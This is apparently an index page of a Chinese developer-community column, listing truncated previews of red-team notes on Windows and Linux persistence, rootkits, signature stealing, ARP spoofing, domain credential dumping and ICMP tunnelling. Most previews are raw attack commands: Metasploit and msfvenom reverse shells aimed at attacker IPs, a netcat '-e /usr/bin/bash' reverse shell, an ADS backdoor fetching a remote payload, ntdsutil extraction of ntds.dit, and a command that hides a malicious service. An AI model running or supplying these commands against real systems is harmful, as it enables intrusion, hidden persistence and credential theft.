首页
学习
活动
专区
工具
TVP
发布

子云笔记

专栏作者
35
文章
32709
阅读量
13
订阅数
office模板
VBA可以插入到基本模板中,并用于在相应的 Office 应用程序启动时执行代码以获得持久性默认情况下,Word 会创建一个Normal.dotm 模板,可以对其进行修改以包含恶意宏Word Normal.dotm location:C:\Users\<username>\AppData\Roaming\Microsoft\Templates\Normal.dotm%APPDATA%\Microsoft\Templates\ --> Normal.dotm分析Empire -- usestager/wind
浪子云
2022-11-24
8130
windows粘贴劫持
pastejacker粘贴劫持是恶意网站用来控制计算机剪贴板并将其内容更改为有害内容的方法该工具的主要目的是自动化(粘贴劫持/剪贴板中毒/无论您命名什么)攻击,将攻击中使用的所有已知技巧收集在一个地方和一个自动化作业中由于这种攻击取决于用户将粘贴的内容,因此我将Metasploit网络交付模块的想法实现到工具中,因此当用户粘贴到终端中时,您可以在他的设备上获得meterpreter会话图片图片
浪子云
2022-11-20
1.8K0
.so注入
https://github.com/chokepoint/azazelapt-get install libpam0g-dev gcc make python libssl-dev libpcap-dev -yubuntu16-servermake && make installINSTALL=/libCFLAGS+= -WallLDFLAGS+= -lc -ldl -lpam -lutilall: config libselinux.soclient:$(CC) -fPIC client.c -shar
浪子云
2022-11-16
7120
windows屏幕保护程序
攻击者可以通过执行由用户不活动触发的恶意内容来建立持久性。屏幕保护程序是在用户不活动时间的可配置时间后执行的程序,由文件扩展名为 .scr 的可移植可执行 (PE) 文件组成。Windows屏幕保护程序应用程序scrnsave.scr位于64位Windows系统中,以及基本Windows安装中包含的屏幕保护程序。C:\Windows\System32\C:\Windows\sysWOW64\以下屏幕保护程序设置存储在注册表 () 中,可以对其进行操作以实现持久性:HKCU\Control Panel\Des
浪子云
2022-11-10
1.5K0
linux系统服务-进程
#service_persistenceuse exploit/multi/script/web_deliveryset target 7set payload linux/x64/meterpreter/reverse_tcpset lhost 192.168.85.161set lport 4949exploit -juse linux/local/service_persistenceset session 1set lport 9090set target 3exploit -jsystemd-c
浪子云
2022-11-09
2K0
隐藏服务-sddl
use exploit/multi/script/web_delivery use exploit/windows/local/persistence_servicecmd:sc query cqvsfnsc qc cqvsfnpowershell:get-service -name cqvsfnJoshua Wright提供的方法使用sc 命令的sdset模块可以修改服务的安全描述符:SDDL隐藏cmd:(隐藏服务)sc.exe sdset cqvsfn "D:(D;;DCLCWPDTSDCC;;;IU)
浪子云
2022-09-30
4170
窃取分析PE签名
Stealing Signatures and Making One Invalid Signature at a Time.https://github.com/secretsquirrel/SigThief从二进制文件中获取签名并将其添加到另一个二进制文件python sigthief.py -i 360.exe -t cmd.exe -o 361.exehttps://blog.didierstevens.com/programs/authenticode-tools/分析PESig是一种检查PE文件
浪子云
2022-09-13
5490
arp投毒
cat /proc/sys/net/ipv4/ip_forwardecho 1 >> /proc/sys/net/ipv4/ip_forwardcat /proc/sys/net/ipv4/ip_forwardarpspoof -i eth0 -t 192.168.63.148 -r 192.168.63.2arpspoof -i eth0 -t 192.168.63.2 -r 192.168.63.148python sniff-pcap.py -i 110.242.68.66 -c 100 -o 12
浪子云
2022-09-04
1.9K0
ntdsutil+NTDSDumpEx
%SystemRoot%\ntds\ntdsutil snapshot "activate instance ntds" create quit quitntdsutil snapshot "mount {db105e51-d615-44bd-805b-20336cdd2a34}" quit quitcopy C:\$SNAP_202304251256_VOLUMEC$\Windows\NTDS\ntds.dit c:\temp\ntds.ditntdsutil snapshot "umount {db1
浪子云
2022-09-03
3680
Invoke-ADSBackdoor
nishang set-executionpolicy remotesigned Import-Module .\Invoke-ADSBackdoor.ps1 Invoke-ADSBackdoor -PayloadURL http://172.18.13.120:8080/1.ps1 Invoke-ADSBackdoor脚本能在nfts数据流中留下一个永久性的后门 Invoke-ADSBackdoor脚本用于向ADS注入代码并以普通用户权限运行 备用数据流(ADS)是微软的一项功能,其目的是
浪子云
2022-08-24
4510
windows文件时间戳修改
创建时间修改$(Get-Item FILENAME.EXT).creationtime=$(Get-Date "12/24/2020 07:15 am")$(Get-Item .\mOaDU.exe).creationtime=$(Get-Date "12/24/2020 07:15 am")访问时间修改$(Get-Item .\mOaDU.exe).lastaccesstime=$(Get-Date "12/24/2011 07:15 am")修改时间修改$(Get-Item .\mOaDU.exe).l
浪子云
2022-08-18
4.7K0
exploit/windows/local/cve_2022_21882_win32k
msf6 exploit(windows/local/cve_2022_21882_win32k) > sessionsActive sessions=============== Id Name Type Information Connection -- ---- ---- ----------- ----
浪子云
2022-08-17
3870
exploit/windows/local/persistence_service
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.18.13.90 lport=9999 -f exe > 123.exeuse exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost 172.18.13.90set lport 9999exploit -jmsf6 exploit(multi/handler) > sessionsActive
浪子云
2022-07-22
5150
内网安全-上传和下载
利用FTP协议上传文件sudo apt-get install vsftpd -ysudo mkdir /ftp && cd /ftp && mkdir uploadfilesudo chmod 777 -R /ftp/uploadfilevim /etc/vsftpd.conf anonymous_enable=YESanon_root=/ftp/uploadfileno_anon_password=YESwrite_enable=YESanon_upload_enable=YESanon_mkdir_w
浪子云
2022-07-18
3980
cron
msfvenom -p cmd/unix/reverse_bash LHOST=172.18.13.90 LPORT=9898 -f raw > shell.shuse exploit/multi/handlerset payload cmd/unix/reverse_netcatset lhost 172.18.13.90set lport 9797exploit -juse exploit/linux/local/cron_persistenceset target 2set payload cmd/
浪子云
2022-07-06
9750
Boot or Logon Autostart Execution: Authentication Package
Boot or Logon Autostart Execution: Authentication PackageHKLM\SYSTEM\CurrentControlSet\Control\Lsa\"Authentication Packages"=<target binary>SSP维持域控权限1.privilege::debugmisc::memsspC:\Windows\System32:mimilsa.log重启后失效2.注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentCon
浪子云
2022-06-29
2450
反向shell
apt-get -y install netcat-traditionalupdate-alternatives --config nc nc文件传输接受端:nc -lp 333 > 1.exe发送端:nc -vn 172.18.13.90 333 < 4.1.exe -q 1nc简易聊天A:nc -l -p 888B:nc -vn 172.18.13.90 888nc反向shell:目标机:nc 172.18.13.90 9999 -e /usr/bin/bash攻击机:nc -lvp 9999pytho
浪子云
2022-06-26
4490
icmp-ptunnel
icmp-ptunnelwget http://www.tcpdump.org/release/libpcap-1.9.0.tar.gzapt install -y byaccapt install -y flex ./configuremake && make install wget http://www.cs.uit.no/~daniels/PingTunnel/PingTunnel-0.72.tar.gzmake && make install vim /etc/ld.so.conf/usr/lo
浪子云
2022-06-25
4600
empire-registry
empire-registrypowershell-empire serverpowershell-empire clientuselistener httpset Name testset Port 8899executebacklistenersusestager windows/cmd_execset Listener testset OutFile shell33.batexecuteusemodule powershell/persistence/userland/registryset RegP
浪子云
2022-06-24
3010
icmp-icmpsh
icmp-icmpshgit clone https://github.com/inquisb/icmpsh.gitpip2 install flask(需要这个才能离线安装python2的impacket)git clone https://github.com/SecureAuthCorp/impacket.gitpython2 setup.py install (python2离线安装impacket最后会报错无影响)修改run.sh的配置图片图片图片图片图片图片
浪子云
2022-06-23
6080
点击加载更多
社区活动
RAG七天入门训练营
鹅厂大牛手把手带你上手实战,赢鹅厂证书、公仔好礼!
Python精品学习库
代码在线跑,知识轻松学
博客搬家 | 分享价值百万资源包
自行/邀约他人一键搬运博客,速成社区影响力并领取好礼
技术创作特训营·精选知识专栏
往期视频·千货材料·成员作品 最新动态
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档